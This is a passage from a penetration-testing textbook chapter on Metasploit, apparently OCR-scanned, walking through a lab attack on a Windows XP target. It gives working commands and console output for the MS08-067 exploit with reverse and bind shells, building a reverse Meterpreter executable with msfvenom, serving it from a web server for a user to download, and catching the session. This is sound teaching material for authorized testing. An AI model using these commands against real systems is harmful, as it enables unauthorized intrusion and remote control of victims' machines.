Types of Shells

Chapter 4

In the list of compatible payloads shown in Listing 4-7, you see a range of
options including command shells, Meterpreter, a speech API, or execution
of a single Windows command. Meterpreter or otherwise, shells fall into two
categories: bind and reverse.

Bind Shells

A bind shell instructs the target machine to open a command shell and listen
on a local port. The attack machine then connects to the target machine on
the listening port. However, with the advent of firewalls, the effectiveness

of bind shells has fallen because any correctly configured firewall will block
traffic to some random port like 4444.

Reverse Shells

A reverse shell, on the other hand, actively pushes a connection back to the
attack machine rather than waiting for an incoming connection. In this
case, on our attack machine we open a local port and listen for a connec-
tion from our target because this reverse connection is more likely to make
it through a firewall.



You may be thinking, “Was this book written in 2002 or something? My firewall has
egress filtering.” Modern firewalls allow you to stop outbound connections as well as
inbound ones. It would be trivial to stop a host in your environment from connecting
out, for instance, to port 4444. But say I set up my listener on port 80 or port 443.
To a firewall, that will look like web traffic, and you know you have to let your users
look at Facebook from their workstations or there would be mutiny and pandemonium
on all sides.

Setting a Payload Manually

Let’s select a Windows reverse shell for our payload. Set a payload the same
way you set the RHOST option: set payload <payload to use>.

msf exploit(ms08_067 netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp

Because this is a reverse shell, we need to tell the target where to
send the shell; specifically, we need to give it the IP address of the attack
machine and the port we will listen on. Running show options again, shown
in Listing 4-9, displays the module as well as the payload options.

msf exploit(mso8 067 netapi) > show options

Module options (exploit/windows/smb/ms08 067 netapi):

Name Current Setting Required Description

RHOST 192.168.20.10 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique: seh, thread, process, none
OLHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Automatic Targeting

Listing 4-9: Module options with a payload
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LHOST @ is our local host on the Kali machine, the IP address we want
our target machine to connect back to. To find the IP address (if you have
forgotten it), enter the Linux ifconfig command directly into Msfconsole.

msf exploit(mso8_067_netapi) > ifconfig
[*] exec: ifconfig

etho Link encap:Ethernet HWaddr 00:0c:29:0e:8f:11
inet addr:192.168.20.9 Bcast:192.168.20.255 Mask:255.255.255.0

--snip--

Now set the LHOST option with set LHOST 192.168.20.9. Leave the defaults
for LPORT, for the local port to connect back to, as well as for EXITFUNC, which
tells Metasploit how to exit. Now enter exploit, shown in Listing 4-10, to
send our exploit off again, and wait for the shell to appear.

msf exploit(mso8 067 netapi) > exploit

Started reverse handler on 192.168.20.9:4444 ©

Automatically detecting the target...

Fingerprint: Windows XP - Service Pack 3 - lang:English

Selected Target: Windows XP SP3 English (AlwaysOn NX) @

Attempting to trigger the vulnerability...

Command shell session 2 opened (192.168.20.9:4444 -> 192.168.20.10:1374)
at 2015-08-31 10:29:36 -0400

— e —

*]
*]
*]
*]
*]
*]

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Listing 4-10: Running the exploit

Congratulations: You have successfully exploited your first machine!
Here’s what happened. When we enter exploit, Metasploit opens a lis-
tener on port 4444 to catch the reverse shell from the target @. Then, since
we kept the target as the default Automatic Targeting, Metasploit fingerprinted
the remote SMB server and selected the appropriate exploit target for us @.

Once it selected the exploit, Metasploit sent over the exploit string and
attempted to take control of the target machine and execute our selected
payload. Because the exploit succeeds, a command shell was caught by our
handler.

To close this shell, type ¢TRL-C and enter y at the prompt to abort the
session.

C:\WINDOWS\system32>"C
Abort session 2? [y/N] vy

[*] Command shell session 2 closed. Reason: User exit
msf exploit(mso8_067_netapi) >




Msfcli

To return to a Meterpreter shell, you can choose a payload with
Meterpreter in the name such as windows/meterpreter/reverse_tcp and
exploit the Windows XP target again.

Now for another way to interact with Metasploit: the command line inter-
face, Msfcli. Msfcli is particularly useful when using Metasploit inside scripts
and for testing Metasploit modules that you're developing because it lets
you run a module with a quick, one-line command.

Getting Help

To run Msfcli, first exit Msfconsole by entering exit, or just open another
Linux console. Msfcli is in our path, so we can call it from anywhere. Let’s
begin by looking at the help menu for Msfcli with msfcli -h (Listing 4-11).

root@kali:~# msfcli -h
Usage: /opt/metasploit/apps/pro/msf3/msfcli <exploit name> <option=value> [mode]

Mode Description
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You're looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
8 (0)ptions Show available options for this module
® (P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

Listing 4-11: Msfcli help

Unlike with Msfconsole, when using Msfcli, we can tell Metasploit every-
thing it needs to know to run our exploit in just one command @. Luckily,
Msfcli has some modes to help us build the final command. For example,
the 0 mode @ shows the selected module’s options, and P shows the compat-

ible payloads ©.

Showing Options

Let’s use our MS08-067 exploit against our Windows XP target again.
According to the help page, we need to pass Msfcli the exploit name we
want to use and set all our options @. To show the available options use
the 0 mode. Enter msfcli windows/smb/ms08_067_netapi 0 to see the options
for the MS08-067 exploit module, as shown in Listing 4-12.
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root@kali:~# msfcli windows/smb/ms08_067 netapi O
[*] Please wait while we load the module tree...

Name Current Setting Required Description

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Listing 4-12: Module options

We see the same options as we did in Msfconsole. We’re reminded to
set the RHOST option to the IP address of the target machine, but as we saw
on the help page, setting options in Msfcli is a little different from doing do
in Msfconsole. Here we say option=value. For example, to set RHOST, we enter
RHOST=192.168.20.10.

Payloads

For a reminder of the payloads compatible with this module, use the P mode.
Try msfcli windows/smb/ms08_067_netapi RHOST=192.168.20.10 P, as shown in
Listing 4-13.

root@kali:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.20.10 P
[*] Please wait while we load the module tree...

Compatible payloads

Name Description

generic/custom Use custom string or file as payload. Set
either PAYLOADFILE or PAYLOADSTR.

generic/debug_trap Generate a debug trap in the target process

generic/shell_bind_tcp Listen for a connection and spawn a command
shell

generic/shell reverse tcp Connect back to attacker and spawn a command
shell

generic/tight_loop Generate a tight loop in the target process

--snip--

Listing 4-13: Module payloads in Msfcli
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This time, we’ll use a bind shell payload. Recall that a bind shell just
listens on a local port on the target machine. It will be up to our attack
machine to connect to the target machine after the payload has run. Recall
from our work in Msfconsole that choosing a payload requires additional
payload-specific options, which we can view again with the 0 flag.

Because our bind shell won’t be calling back to our attack machine, we
don’t need to set the LHOST option, and we can leave the LPORT option as the



default of 4444 for now. It looks like we have everything we need to exploit
the Windows XP target again. Finally, to tell Msfcli to run the exploit we
use the E flag (Listing 4-14).

root@kali:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.20.10
PAYLOAD=windows/shell_bind_tcp E
[*] Please wait while we load the module tree...

RHOST => 192.168.20.10

PAYLOAD => windows/shell bind tcp

[*] Started bind handler @

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Command shell session 1 opened (192.168.20.9:35156 -> 192.168.20.10:4444)
at 2015-08-31 16:43:54 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Listing 4-14: Running the exploit in Msfcli

It looks like everything worked, and we got another shell. But this time,
instead of starting a reverse handler listening on the specified local port
of 4444, Metasploit starts a handler for the bind shell @. After Metasploit
sends over the exploit string, the bind handler will automatically connect
out to the port specified by the payload and connect to the shell. Once
again, we have taken control of the target machine.

Creating Standalone Payloads with Msfvenom

In 2011, Msfvenom was added to Metasploit. Prior to Msfvenom, the tools
Msfpayload and Msfencode could be used together to create standalone
encoded Metasploit payloads in a variety of output formats, such as Windows
executables and ASP pages. With the introduction of Msfvenom, the func-
tionality of Msfpayload and Msfencode was combined into a single tool,
though Msfpayload and Msfencode are still included in Metasploit. To view
Msfvenom’s help page, enter msfvenom -h.

So far with Metasploit, our goal has been to exploit a vulnerability on
the target system and take control of the machine. Now we’ll do something
a little different. Instead of relying on a missing patch or other security
issue, we are hoping to exploit the one security issue that may never be fully
patched: the users. Msfvenom allows you to build standalone payloads to
run on a target system in an attempt to exploit the user whether through a
social-engineering attack (Chapter 11) or by uploading a payload to a vul-
nerable server, as we’ll see in Chapter 8. When all else fails, the user can
often be a way in.
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Choosing a Payload

To list all the available payloads, enter msfvenom -1 payloads. We’ll use one
of Metasploit’s Meterpreter payloads, windows/meterpreter/reverse_tcp, which
provides a reverse connection with a Meterpreter shell. Use -p to select a
payload.

Setting Options
To see the correct options to use for a module, enter the -o flag after select-
ing a payload, as shown in Listing 4-15.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -o
[*] Options for payload/windows/meterpreter/reverse tcp

Name Current Setting Required Description

EXITFUNC process yes Exit technique: seh, thread, process,
none

LHOST yes The listen address

LPORT 4444 yes The listen port

Listing 4-15: Options in Msfvenom

As expected, our LHOST needs to be set, and our LPORT is set to the default
4444. For practice, set LPORT to 12345 by entering LPORT=12345. We also see
EXITFUNC, which we can leave as the default. Because this is a reverse connec-
tion payload, we need to set our LHOST option to tell the target machine where
to connect back to (our Kali machine).

Choosing an Output Format

Now tell Msfvenom which output format to use. Will we be running this pay-
load from a Windows executable, or do we want to make an ASP file that
can be uploaded to a web server we have gained write access to? To see all
available output formats, enter msfvenom --help-formats.

root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small,
loop-vbs, macho, msi, msi-nouac, psh, psh-net, vba, vba-exe, vbs, war
Transform formats
bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell,
psl, py, python, raw, rb, ruby, sh, vbapplication, vbscript

To select the output format, use the -f option along with the chosen
format:

msfvenom windows/meterpreter/reverse tcp LHOST=192.168.20.9 LPORT=12345 -f exe




But if you run this command as is, you’ll see garbage printed to the
console. While this is technically our executable payload, it doesn’t do us
much good. Instead, let’s redirect the output to an executable file,
chapterdexample.exe.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=12345 -f exe
> chaptergexample.exe

root@kali:~# file chaptergexample.exe

chapterdexample.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

There is no output to the screen, but if we run the file command on
our newly created executable file, we see that it’s a Windows executable that
will run on any Windows system as long as a user attempts to run it. (Later,
in Chapter 12, we’ll see cases where antivirus applications stop a Metasploit
payload and learn ways we can obfuscate our standalone payloads to bypass
antivirus programs. Also, we will cover clever ways to lure users into down-
loading and running malicious payloads in Chapter 11.)

Serving Payloads

One good way to serve up payloads is to host them on a web server, disguise
them as something useful, and lure users into downloading them. For this
example, we’ll host our Metasploit executable on our Kali machine’s built-
in Apache server and browse to the file from our target machine.

First, run cp chaptergexample.exe /var/www to copy the payload executable
to the Apache directory, and then make sure the web server is started with
service apache2 start.

root@kali:~# cp chaptergexample.exe /var/www
root@kali:~# service apache2 start
Starting web server apache2 [ oK ]

Now switch to your Windows XP target and open Internet Explorer.
Browse to http://192.168.20.9/chapterdexample.exe and download the file.

But before we run the file, we have one loose end to deal with.

So far when attempting to exploit our target machine, Metasploit set
up our payload handlers and sent the exploit. When we used Msfconsole to
exploit the MS08-067 vulnerability with a reverse shell payload, Metasploit
first set up a handler listening on port 4444 for the reverse connection, but
up to this point we have nothing listening for a reverse connection from the
payload we created with Msfvenom.

Using the Multi/Handler Module

Start Msfconsole again, and we’ll look at a Metasploit module called multi/
handler. This module allows us to set up standalone handlers, which is just
what we’re lacking. We need a handler to catch our Meterpreter connection
when our malicious executable is run from the Windows XP target. Select
the multi/handler module with use multi/handler.
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The first thing to do is tell multi/handler which of Metasploit’s many
handlers we need. We need to catch the windows/meterpreter/reverse_tcp
payload we used when we created our executable with Msfvenom. Choose
it with set PAYLOAD windows/meterpreter/reverse_tcp, and follow it with show
options (Listing 4-16).

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

Module options (exploit/multi/handler):
Name Current Setting Required Description

Payload options (windows/meterpreter/reverse tcp):

Name Current Setting Required Description
EXITFUNC process yes Exit technique: seh, thread, process,
none
LHOST yes The listen address
LPORT 4444 yes The listen port
--snip--

msf exploit(handler) >

Listing 4-16: Options with multi/handler

From here we tell Metasploit which setup we used when we created the
payload. We’ll set the LHOST option to our local Kali IP address and the LPORT
to the port we chose in Msfvenom, in this case 192.168.20.9 and 12345,
respectively. Once all the options for the payload are set correctly, enter
exploit, as shown in Listing 4-17.

msf exploit(handler) > set LHOST 192.168.20.9
LHOST => 192.168.20.9

msf exploit(handler) > set LPORT 12345

LPORT => 12345

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.20.9:12345
[*] Starting the payload handler...

Listing 4-17- Setting up a handler

As you can see, Metasploit sets up a reverse handler on port 12345 as
instructed, listening for a payload to call back.



Now we can switch back to our Windows XP target and run our down-
loaded executable. Run chapterdexample.exe on your Windows target. Back
in Msfconsole, you should see that the handler receives the reverse connec-
tion, and you receive a Meterpreter session.

[*] Sending stage (752128 bytes) to 192.168.20.10
[*] Meterpreter session 1 opened (192.168.20.9:12345 -> 192.168.20.10:49437)
at 2015-09-01 11:20:00 -0400

meterpreter >

Spend some time experimenting with Msfvenom if you like. We’ll
return to this useful tool when we attempt to bypass antivirus solutions
in Chapter 12.

Using an Auxiliary Module

Metasploit was first conceived as an exploitation framework, and it contin-
ues to be a top contender in the world of exploitation. But in the ensuing
years, its functionality has grown in about as many directions as there are
creative minds working on it. I sometimes quip that Metasploit can do every-
thing except my laundry, and I'm currently working on a module for that.

Dirty socks aside, in addition to exploitation, Metasploit has modules
to aid in every phase of pentesting. Some modules that are not used for
exploitation are known as auxiliary modules; they include things like vulner-
ability scanners, fuzzers, and even denial of service modules. (A good rule
of thumb to remember is that exploit modules use a payload and auxiliary
modules do not.)

For example, when we first used the windows/smb/ms08_067_netapi
exploit module earlier in this chapter, one of its options was SMBPIPE. The
default value for that option was BROWSER. Let’s look at an auxiliary module
that will enumerate the listening pipes on an SMB server, auxiliary/scanner/
smb/pipe_auditor (Listing 4-18). (We use auxiliary modules like exploits, and
like exploits we can also drop the auxiliary/ part of the module name.)

msf > use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

Name Current Setting Required Description

ORHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

Listing 4-18: Options for scanner/smb/pipe_auditor
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The options for this module are a bit different from what we’ve seen so
far. Instead of RHOST we have RHOSTS @, which allows us to specify more than
one remote host to run the module against. (Auxiliaries can be run against
multiple hosts, whereas exploits can exploit only one system at a time.)

We also see options for SMBUser, SMBPass, and SMBDomain. Because our
Windows XP target is not part of any domain, we can leave the SMBDomain
at the default value, WORKGROUP. We can leave the SMBUser and SMBPass values
blank. The THREADS option allows us to control the speed of Metasploit by
having our module run in multiple threads. We're scanning only one sys-
tem in this case, so the default value of 1 thread will work fine. The only
option we need to set is RHOSTS to the IP address of our Windows XP target.

msf auxiliary(pipe auditor) > set RHOSTS 192.168.20.10
RHOSTS => 192.168.20.10

Even though we aren’t technically exploiting anything in this case, we
can still tell Metasploit to run our auxiliary module by entering exploit.

msf auxiliary(pipe auditor) > exploit

[*] 192.168.20.10 - Pipes: \browser @
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(pipe_auditor) >

The module audits the listening SMB pipes on our Windows XP tar-
get. As it turns out, the browser pipe is the only available pipe @. Because
this pipe is listening, this is the correct value for the SMBPIPE option in
the windows/smb/ms08_067_netapi exploit module we used earlier in the
chapter.

UPDATING METASPLOIT

The exercises in this book are designed to work on a base install of Kali
Linux 1.0.6. Naturally, many security tools used in this book will have been
updated since Kali's release. Metasploit in particular receives regular updates
from core developers as well as from the security community.

All of the material in this book works with the Metasploit version installed
on Kali 1.0.6. As you continue your career as a pentester, you'll want the latest
Metasploit modules. The Metasploit Project is typically pretty solid at releasing
modules for the latest security issues circulating the Web. To pull down the lat-
est modules from Metasploit’s GitHub, enter the following:

root@kali:~# msfupdate
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Summary

In this chapter we’ve gotten comfortable using some of Metasploit’s inter-
faces. We’ll return to Metasploit throughout the book.

In the next few chapters we’ll simulate a penetration test against our
target machines, covering a wide variety of vulnerability types. If you pur-
sue a career in penetration testing, you will likely encounter clients span-
ning the gamut of possible security postures. Some will be missing so many
patches across the organization that you may wonder if they have updated
since installing the base image back in 2001. Along with missing patches,
you may find additional vulnerabilities such as default passwords and mis-
configured services. Gaining access to such networks is trivial for skilled
penetration testers.

On the other hand, you may also find yourself working for clients who
have patch management down pat, with everything from Windows operat-
ing systems to all third-party software on a regular patch cycle across the
organization. Some clients may deploy cutting-edge security controls such
as proxies that allow only Internet Explorer to call out to the Internet. This
will stop even Metasploit reverse shells that call back on ports 80 or 443 and
look like web traffic, unless you are able to exploit the Internet Explorer
program, which may also be completely patched. You may find intrusion
prevention firewalls at the perimeter that drop any string that looks even
a little bit like attack traffic.

Simply throwing the MS08-067 Metasploit module at these high-
security networks will get you no results, except maybe a call from a net-
work monitoring vendor with a warrant for your arrest. (Don’t worry: As
part of the penetration test, you will have a get-out-ofjail-free card.) But
even highly secure networks are only as strong as their weakest link. For
instance, I once performed an onsite penetration test for a company that
employed all of the security controls I just mentioned. However, the local
administrator password on all the Windows workstations was the sam